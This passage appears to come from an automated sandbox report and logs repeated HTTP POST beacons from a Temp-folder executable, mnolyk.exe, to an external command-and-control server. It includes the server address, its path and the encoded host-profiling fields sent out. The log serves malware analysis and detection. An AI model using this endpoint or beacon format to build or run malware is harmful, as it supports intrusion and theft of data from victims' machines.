                                                                      382 | 192.168.2.7 | 50077 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:45.296740055 CET | 497 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.363030910 CET | 497 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      383 | 192.168.2.7 | 50078 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:45.546416044 CET | 498 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.609366894 CET | 498 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      384 | 192.168.2.7 | 50079 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:45.791596889 CET | 499 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.856878042 CET | 499 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      385 | 192.168.2.7 | 50080 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:46.056281090 CET | 500 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.123063087 CET | 500 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      386 | 192.168.2.7 | 50081 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:46.318732977 CET | 501 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.383594036 CET | 501 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      387 | 192.168.2.7 | 50082 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:46.560439110 CET | 502 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.625701904 CET | 502 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      388 | 192.168.2.7 | 50083 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:46.810774088 CET | 503 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.876943111 CET | 503 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      389 | 192.168.2.7 | 50084 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:47.056885004 CET | 504 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.123337030 CET | 504 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      39 | 192.168.2.7 | 49733 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:11.073843002 CET | 143 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.142923117 CET | 143 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      390 | 192.168.2.7 | 50085 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:47.307738066 CET | 505 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.372236013 CET | 505 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      391 | 192.168.2.7 | 50086 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:47.567671061 CET | 506 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.632725000 CET | 506 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      392 | 192.168.2.7 | 50087 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:47.809633017 CET | 507 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.874619007 CET | 507 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      393 | 192.168.2.7 | 50088 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:48.057972908 CET | 508 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.123852015 CET | 508 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      394 | 192.168.2.7 | 50089 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:48.291497946 CET | 509 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.359700918 CET | 509 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      395 | 192.168.2.7 | 50090 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:48.540225983 CET | 510 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.605078936 CET | 510 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      396 | 192.168.2.7 | 50091 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:48.773540020 CET | 511 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.838476896 CET | 511 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      397 | 192.168.2.7 | 50092 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:49.011979103 CET | 512 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.082272053 CET | 512 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      398 | 192.168.2.7 | 50093 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:49.276434898 CET | 513 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.342191935 CET | 513 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      399 | 192.168.2.7 | 50094 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:49.510005951 CET | 514 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.573791981 CET | 514 | IN | HTTP/1.1 200 OK
